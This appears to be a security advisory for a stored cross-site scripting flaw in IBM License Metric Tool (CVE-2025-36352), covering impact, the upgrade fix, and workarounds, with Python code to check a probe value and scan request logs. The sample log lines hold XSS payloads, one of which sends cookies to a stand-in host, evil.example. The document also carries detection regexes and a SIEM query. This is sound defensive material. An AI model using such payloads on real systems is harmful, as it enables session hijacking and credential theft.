CVE-2025-36352
📋 TL;DR
IBM License Metric Tool versions 9.2.0 through 9.2.40 contain a stored cross-site scripting (XSS) vulnerability: an authenticated user can save attacker-controlled JavaScript through the web interface, and that script later executes in the browser of every other user who views the stored content. Because it runs with the viewer's session, it can hijack that session or capture credentials. Exploitation requires an authenticated account; unauthenticated users cannot trigger it.
💻 Affected Systems
- IBM License Metric Tool
📦 What is this software?
IBM License Metric Tool (ILMT) is IBM's software-asset and license-compliance application: it discovers installed IBM software across an estate and reports usage (including sub-capacity PVU figures) through a web interface, built on BigFix infrastructure. That web interface is the component affected by this issue.
⚠️ Risk & Real-World Impact
Worst Case
Any authenticated user stores a payload in a field that an administrator later views. The script runs in the administrator's browser session, steals the session token or performs administrative actions on the attacker's behalf, and gives the attacker full control of the tool, which holds inventory data for every monitored server and could serve as a pivot point to other systems in the network.
Likely Case
Attackers capture session cookies or credentials from users who view the stored content, gaining unauthorized access to the License Metric Tool at the privilege level of whoever viewed it.
If Mitigated
If user-supplied values are HTML-encoded when they are rendered back into the page (with input validation as defense in depth), the injected markup is displayed as inert text rather than executed as script.
🎯 Exploit Status
Exploitation needs an authenticated account with permission to write to a field that other users later view, plus an ordinary stored-XSS payload; no special tooling is required. No public exploit code is known at this time.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 9.2.41 or later
Vendor Advisory: https://www.ibm.com/support/pages/node/7246534
Restart Required: No
Instructions:
1. Download IBM License Metric Tool version 9.2.41 or later from IBM Fix Central.
2. Follow IBM's upgrade documentation for your specific deployment.
3. Verify the upgrade completes successfully and the reported version is 9.2.41 or later.
🔧 Temporary Workarounds
Input Validation Enhancement
All platforms: Because this is a vendor application, validation cannot be added inside the product itself; the practical equivalent is a reverse proxy or WAF in front of the web interface that rejects requests whose fields contain script tags, event-handler attributes or javascript: URIs. Treat this as defense in depth only: filters are bypassable with encoding tricks, and output encoding in the application (the vendor fix) is the real control.
Content Security Policy
All platforms: Serve a strict Content-Security-Policy header (again from the proxy, since the product's own responses cannot be changed) that limits script sources to the application's own origin and disallows inline script. Roll it out in report-only mode first: the web interface may depend on inline scripts, and a policy that blocks them will break the UI as well as the payload.
🧯 If You Can't Patch
- Restrict user permissions to minimize who can create or modify content in the web interface.
- Implement web application firewall rules to detect and block XSS payloads, matching after URL decoding and case-insensitively; expect determined attackers to find bypasses, so log and alert on blocked requests rather than relying on blocking alone.
🔍 How to Verify
Check if Vulnerable:
Check the IBM License Metric Tool version via the web interface or the installation directory. If the version is 9.2.0 through 9.2.40 inclusive, the instance is vulnerable.
Check Version:
Check the 'About' section in the web interface or examine the installation directory for version files.
Verify Fix Applied:
After patching, confirm the reported version is 9.2.41 or later. Then, in an instance you are authorised to test, store an inert marker containing < > and quote characters in a user-editable field and view that record as a second user: in the page source the marker should appear HTML-encoded (as text), not as a live tag. Use an inert marker rather than alert() payloads, particularly on production systems.
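One way to judge the result of that probe, as an added example written for this page rather than IBM's own code: save the marker below into a field, fetch the page where other users would see it, and classify how the value came back. The sample pages are constructed, not real License Metric Tool output, and the field names are hypothetical.

```python
"""Classify how a stored probe value is rendered: raw, HTML-encoded, stripped or absent.

Added example for this advisory, not IBM code. It inspects page bodies you have
already fetched from a test instance you are authorised to test; the sample
pages and field names below are constructed.
"""
import html

# Inert marker: distinctive, contains the characters XSS needs (< > " ' /),
# but executes nothing even if the page renders it unencoded.
MARKER = '<xss-probe id="cve-2025-36352" data-q=\'1\'></xss-probe>'

def classify(page: str, marker: str = MARKER) -> str:
    """Return one of "raw", "encoded", "stripped", "absent" for the marker in page."""
    if marker in page:
        return "raw"        # tag reached the DOM unencoded: the field is still vulnerable
    if html.escape(marker, quote=True) in page or html.escape(marker, quote=False) in page:
        return "encoded"    # rendered as text: output encoding is effective for this field
    if "cve-2025-36352" in page and "xss-probe" not in page:
        return "stripped"   # tag removed by validation; acceptable, but it is filtering, not encoding
    return "absent"         # value not shown on this page: probe the page that displays it

def probe_fields(pages: dict) -> dict:
    """Map field name -> classification for several fetched pages at once."""
    return {field: classify(body) for field, body in pages.items()}

# Constructed sample pages showing each outcome (not real product output)
SAMPLE_PAGES = {
    "notes (unpatched)": f'<td class="notes">{MARKER}</td>',
    "notes (patched)":   f'<td class="notes">{html.escape(MARKER, quote=True)}</td>',
    "name (filtered)":   '<td class="name">cve-2025-36352</td>',
    "vendor":            '<td class="vendor"></td>',
}

if __name__ == "__main__":
    for field, verdict in probe_fields(SAMPLE_PAGES).items():
        print(f"{field}: {verdict}")
```

Note that "raw" on any field after the upgrade means the fix did not cover that field, and "absent" means you fetched a page that does not display the value; stored XSS fires on viewing, so the page that matters is the one a second user sees.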
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests containing script tags or JavaScript code to web interface endpoints
- Multiple failed login attempts followed by successful authentication and content modification
Network Indicators:
- HTTP requests containing suspicious script payloads in parameters or body
- Requests from user workstations to unfamiliar external hosts immediately after loading License Metric Tool pages (the exfiltration in a stored XSS comes from the victim's browser, not from the server)
SIEM Query:
source="ibm_license_tool" AND (http_request_body CONTAINS "<script>" OR http_request_body CONTAINS "javascript:")
Match case-insensitively and after URL decoding, and extend the terms to event-handler attributes such as "onerror=" and "onload="; a literal "<script>" match alone misses "<SCRIPT>", "%3Cscript%3E" and image or SVG tags carrying handlers.
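The same detection logic run over sample request logs, as an added example written for this page rather than IBM's own code, covering the variants a literal "<script>" match misses. The log line layout and paths are constructed; map the real License Metric Tool or reverse-proxy request logs onto the parse step.

```python
"""Scan request logs for stored-XSS injection attempts against a web UI.

Added example for this advisory, not IBM code. The log line format and the
paths below are constructed for illustration; the real License Metric Tool
(or reverse proxy) logs need to be mapped onto the parse step.
"""
import html
import re
from urllib.parse import unquote_plus

# Markers the SIEM query on this page looks for, plus the variants a literal
# "<script>" match misses: mixed case, attribute event handlers, javascript:
# URIs and tags other than <script>. All matched after decoding.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon(error|load|click|mouseover|focus|input)\s*=", re.I),
    re.compile(r"<\s*(iframe|svg|img|object|embed)\b", re.I),
]

def normalize(value: str) -> str:
    """Strip URL and HTML-entity encoding, including double encoding (bounded)."""
    for _ in range(3):
        step = html.unescape(unquote_plus(value))
        if step == value:
            break
        value = step
    return value

def find_xss(body: str) -> list:
    """Return the patterns that match the decoded request body."""
    text = normalize(body)
    return [p.pattern for p in XSS_PATTERNS if p.search(text)]

# Constructed log layout: timestamp user METHOD path body="..."
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<path>\S+) body="(?P<body>.*)"$'
)

def scan_log(lines) -> list:
    """Return (timestamp, user, path, matched patterns) for each suspicious write."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] not in ("POST", "PUT"):   # stored XSS needs a write
            continue
        matched = find_xss(m["body"])
        if matched:
            hits.append((m["ts"], m["user"], m["path"], matched))
    return hits

# Constructed sample lines (not real License Metric Tool logs)
SAMPLE_LOG = [
    '2025-06-01T10:00:01Z alice POST /contracts/new body="name=Payroll+Server&notes=renewed"',
    '2025-06-01T10:02:14Z mallory POST /contracts/new body="notes=%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E"',
    '2025-06-01T10:03:30Z mallory PUT /contracts/7 body="notes=%3Cimg+src%3Dx+onerror%3Dfetch(%27//evil.example/%3F%27%2Bdocument.cookie)%3E"',
    '2025-06-01T10:05:00Z bob GET /contracts/7 body=""',
    '2025-06-01T10:06:00Z carol POST /contracts/new body="notes=Discussed+with+the+javascript+team"',
]

if __name__ == "__main__":
    for ts, user, path, matched in scan_log(SAMPLE_LOG):
        print(ts, user, path, matched)
```

Only the two writes by mallory are flagged: the upper-case, URL-encoded <SCRIPT> and the <img onerror=...> handler that a literal "<script>" match would miss, while carol's mention of "javascript" in plain text is not. Treat hits as triage leads and pull the affected record to confirm what was stored.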